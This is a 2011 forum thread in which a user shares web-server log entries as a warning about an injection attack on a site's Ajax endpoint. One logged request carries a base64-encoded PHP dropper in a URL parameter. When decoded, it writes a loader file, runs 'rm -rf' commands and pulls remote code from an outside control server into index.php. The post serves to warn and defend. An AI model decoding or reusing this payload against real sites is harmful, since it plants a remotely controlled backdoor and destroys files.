ajax code injection hacking attempt

Discussion in 'Javascript' started by me, Sep 7, 2011.

  1. me

    me Guest

    :)

    I came across this in my log files today, and thought I'd warn people who
    use Ajax. (Could be a well documented thing, I don't know where to check)

    77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "GET
    /engine/ajax/updates.php?wert=1&user_id=QGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOwoKJHVwbG9hZERpciA9ICcuLi8uLi91cGxvYWRzJzsKJGxvYWRlck5hbWUgPSAnbG9hZGVyei4zNDQwNDY5M2JiNzE4ZmFmZDg1NzI3MTg4M2M2NmQ3Ni5waHAnOwoKaWYgKGlzX2RpcigkdXBsb2FkRGlyKSkKewoJJGZwID0gZm9wZW4oIiR1cGxvYWREaXIvJGxvYWRlck5hbWUiLCAndycpOwoJZndyaXRlKCRmcCwgYmFzZTY0X2RlY29kZSgnUEQ5d2FIQUtDa0JwYm1sZmMyVjBLQ2RoYkd4dmQxOTFjbXhmWm05d1pXNG5MQ0F4S1RzS0NpUnZiR1JFYVhJZ1BTQW5ZbkJyZEdWdkp6c0tKRzVsZDBScGNpQTlJQ2RpY0d0MFpXOG5Pd29rYkc5aFpHVnlUbUZ0WlNBOUlDZHNiMkZrWlhKNkxqTTBOREEwTmprelltSTNNVGhtWVdaa09EVTNNamN4T0Rnell6WTJaRGMyTG5Cb2NDYzdDZ3BBWlhobFl5Z2ljbTBnTFhKbUlDUnZiR1JFYVhJZ0pHNWxkMFJwY2lBcWJHOWhaR1Z5ZWlvaUtUc0tRSE41YzNSbGJTZ2ljbTBnTFhKbUlDUnZiR1JFYVhJZ0pHNWxkMFJwY2lBcWJHOWhaR1Z5ZWlvaUtUc0tRSEp0WkdseUtDUnZiR1JFYVhJcE93cEFjbTFrYVhJb0pHNWxkMFJwY2lrN0NrQjFibXhwYm1zb0pHeHZZV1JsY2s1aGJXVXBPd29LYVdZZ0tDRkFhWE5mWkdseUtDUnVaWGRFYVhJcEtRcDdDZ2trYjJ4a1gzVnRZWE5ySUQwZ1FIVnRZWE5yS0RBcE93b0pRRzFyWkdseUtDUnVaWGRFYVhJc0lEQTNOemNwT3dvSlFIVnRZWE5yS0NSdmJHUmZkVzFoYzJzcE93a0tDVUJsZUdWaktDSmphRzF2WkNBM056Y2dKRzVsZDBScGNpSXBPd3A5Q2dwcFppQW9RR2x6WDJScGNpZ2tibVYzUkdseUtTa0tld29KSkdad0lEMGdabTl3Wlc0b0lpUnVaWGRFYVhJdmFXNWtaWGd1Y0dod0lpd2dKM2NuS1RzS0NXWjNjbWwwWlNna1puQXNJRUJpWVhObE5qUmZaR1ZqYjJSbEtHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektDZG9kSFJ3T2k4dlpHOW5hWE5sY25abGNpNWpiMjB2WTI5dWRISnZiQzlzYjJGa1pYSXVjR2h3UDNCaGMzTjNiM0prUFVwSVIwSldhbXRvYzJrNGVXaDFOalYwTTNWNVp5WmhZM1JwYjI0OWFXNWtaWGduS1NrcE93b0pabU5zYjNObEtDUm1jQ2s3Q2drSkNnbHBaaUFvUUdacGJHVmZaWGhwYzNSektDSWtibVYzUkdseUwybHVaR1Y0TG5Cb2NDSXBLUW9KZXdvSkNYQnlhVzUwSUNjNU1UYzBOamczTmpJMU5qUTROQ2M3Q2dsOUNna0tDVUIxYm14cGJtc29KR3h2WVdSbGNrNWhiV1VwT3dwOUNnby9QZz09JykpOwoJZmNsb3NlKCRmcCk7CgoJcHJpbnQgJzkxNzQ2ODc2MjU2NDg0JzsKfQ==
    HTTP/1.1" 301 3844 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
    SV1; .NET CLR 1.1.4322)"
    77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "POST
    /engine/ajax/keywords.php HTTP/1.1" 301 457 "-" "Mozilla/4.0 (compatible;
    MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "GET
    /index.php?do=lostpassword&douser=1 HTTP/1.1" 301 481 "-" "Mozilla/4.0
    (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

    Marc.
     
    me, Sep 7, 2011
    #1
    1. Advertisements


  2. I've decoded the above here: http://pastebin.com/1vwJEUw0
     
    Michael Haufe (TNO), Sep 7, 2011
    #2
    1. Advertisements

  3. me

    me Guest

    Thanks; googling their server name reveals it's a known attack that's been
    around since 2009; more info at: http://pastebin.com/Qtk8jSfR

    Marc.
     
    me, Sep 7, 2011
    #3
    1. Advertisements

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments (here). After that, you can post your question and our members will help you out.